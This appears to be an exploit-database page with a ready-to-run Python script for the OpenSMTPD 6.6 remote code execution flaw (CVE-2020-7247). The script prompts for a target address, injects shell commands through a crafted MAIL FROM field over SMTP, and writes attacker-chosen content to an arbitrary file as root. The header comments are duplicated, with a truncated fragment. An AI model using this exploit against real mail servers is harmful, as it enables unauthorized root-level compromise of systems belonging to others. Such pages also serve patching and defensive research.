Vulnerabilities

OpenBSD OpenSMTPD 6.6 Remote Code Execution

# Exploit Title: OpenBSD OpenSMTPD Remote Code Execution Vulnerability
# Date: 05/04/2021
# Exploit Author: Tobias Marcotto
# Tested on: Kali Linux x64
# Version: 6.6
# Descri # Exploit Title: OpenBSD OpenSMTPD Remote Code Execution Vulnerability
# Date: 05/04/2021
# Exploit Author: Tobias Marcotto
# Tested on: Kali Linux x64
# Version: 6.6
# Description: smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
# CVE : CVE-2020-7247


*********************************************************************************************************


import socket, time
import sys

HOST = input("what is the ip address of the host?: ")
PORT = 25 # The same port as used by the server
s = None

writeto = input("Which file do you want to write to?: ")#raw inputen
writewhat = input("What do you want to write to the file?: ")
payload = b"""
#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
echo '"""+writewhat.encode()+b"""' > """+writeto.encode()+b"""
.
"""

for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except OSError as msg:
s = None
continue
try:
s.connect(sa)
except OSError as msg:
s.close()
s = None
continue
break
if s is None:
print('could not open socket')
sys.exit(1)
with s:
data = s.recv(1024)
print('Received', repr(data))
time.sleep(1)
print('sending')
s.send(b"helo test.com ")
data = s.recv(1024)
print('Received', repr(data))
s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;> ")
time.sleep(1)
data = s.recv(1024)
print('Received', repr(data))
s.send(b"RCPT TO:<root> ")
data = s.recv(1024)
print('Received', repr(data))
s.send(b"DATA ")
data = s.recv(1024)
print('Received', repr(data))
s.send(payload)
data = s.recv(1024)
print('Received', repr(data))
s.send(b"QUIT ")
data = s.recv(1024)
print('Received', repr(data))
print("done")
s.close()

Share your comment publicly